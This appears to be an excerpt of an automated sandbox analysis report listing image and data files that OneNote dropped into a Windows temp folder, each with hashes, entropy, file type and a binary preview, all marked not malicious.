SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{8293A8A4-6928-4F73-AD89-26C136846DE0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Temp\{85E646EF-94C9-4A9C-9939-5A5DCE409CCC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Temp\{88CAD5CB-A975-41B5-94C9-8194997F2532}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Temp\{88E2CF14-E870-4D9E-A6A8-BE869E63D347}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{89099724-BA1D-42DC-B27D-75D5EFE888A1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Temp\{8A74C9CE-FCDD-4275-B8E6-C121F65A9012}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Temp\{8CAAC281-5636-41C7-AEED-2E3FFBD830AF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{8ED31C08-CFF6-4D56-BA94-4144874458A0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
Category:	dropped
Size (bytes):	3555
Entropy (8bit):	7.686253071499049
Encrypted:	false
SSDEEP:	96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
MD5:	8A5444524F467A45A5A10245F89C855A
SHA1:	ACE68D567B02B68275E0345C86DB1139C0EC1386
SHA-256:	7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
SHA-512:	8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..\|3.........................Q..../c.....f.}8....D..\|k..Z......0..~..c..e..m(...\|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB\|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

C:\Users\user\AppData\Local\Temp\{8F3BA076-04E9-4467-841B-0BE4B4245498}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{95D25D58-648A-4D70-8F6D-81E929C2E2FD}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.650926846063169
Encrypted:	false
SSDEEP:	6:RaNfYyfB3h1RRXUnfe/sxGNFFBl/FKtvQ/WmA3q/WmsBRujlw//0lweI/SR/Wmsq:RaNfYyf9/UfVxGNFFBtMAWf/S/
MD5:	05951B7BABBBB75D93149C134F749481
SHA1:	BE5229540DD2B2F2E71E95B3BF2D2F4CFAC57D2C
SHA-256:	CFDFBDFEA768CF29DF1ED9DBB1E23BD13524B956A8337323CB64BD7CA1A26FDA
SHA-512:	3D1AB3ABEAF4DF8A57BD78BA945558AED778CFB7C96E1A7BEA66E6F53BC8B5A77F771F95F710452DD225AF427E0ADC76077DE79EF99C1EA778B7B406ABFE71BF
Malicious:	false
Preview:	./.C..vL....W"v_w...?H.A.w...CDn................?.....I...............................................................................................................h..................................................D...H.O0..........pR..(L..P.M&..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{97DA42DA-7A9F-4DC6-B417-5A4D5193BC74}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Temp\{98AE4148-2C92-415B-A7FE-AA00A40841D4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Temp\{98B57D6F-5569-4264-B02C-CDBADC76CB63}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{9ABF207F-93A0-44E3-9F20-68A78BF12307}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6517910672836811
Encrypted:	false
SSDEEP:	6:RaALUEjYyfB3h1RRXUnfbVlXAVFFBl/FKLYrkXBRujlw//0lweI/ApXjRujd:RaAVjYyf9/UfJ1CFFBtsYgGWf/o6
MD5:	121FE1D0B62E8E1582F14E4E2F6F4113
SHA1:	8EBA03EB87F11690CB8DECCE423DC69C92A7857B
SHA-256:	CFFD7535C831D83052588D1BD07AD0442D5EDE4E6CA3F1FCF157EDCB30D761D8
SHA-512:	C2C862090DDC7788EDBFB99AE5C897F04766A9C3608587101B740A8E3A5A432AD1F663AA4C7F04B3CA82CD7B6512BBE195A404C412E8C076A04901531A343787
Malicious:	false
Preview:	./.C..vL....W"v_b.#%@..K.b7L...m................?.....I...............................................................................................................h............................................F..(s.F.~...N9v...........$.*.G..5...K{............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{9EED92C5-265F-473E-97AD-7859563323AC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Temp\{9F631C80-C7E2-4A44-882E-10D02117ACB8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6469000252434838
Encrypted:	false
SSDEEP:	6:RaapFYyfB3h1RRXUnfuQk8tMRFFBl/FKPvyTFYMyXlBRujlw//0lweI/UMyXljR0:RaKFYyf9/Ufi8teFFBt7TgXUWf/mX8
MD5:	604F6C993A2A97CFEFE1B082841FFE97
SHA1:	D9760FA494FCF7F4E23AFF77482F87D6A7E9E3E6
SHA-256:	CA8C86B5F5E95A58A3B819237B302B48485A6A7125B2C60E1A5FABEF13C8F124
SHA-512:	AE25F6C700A8427560D1B994C158545933BD53920EE9563523F3AA88FCA404D63E5081F6458EBDB8829BF1E8F8FADD652B60CDF7625EF2BAC7FFDB8F5F6D42E5
Malicious:	false
Preview:	./.C..vL....W"v_..#....E.Q..G/.a................?.....I...............................................................................................................h..............................................F.9.E.0*..y9................B....E.#D............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

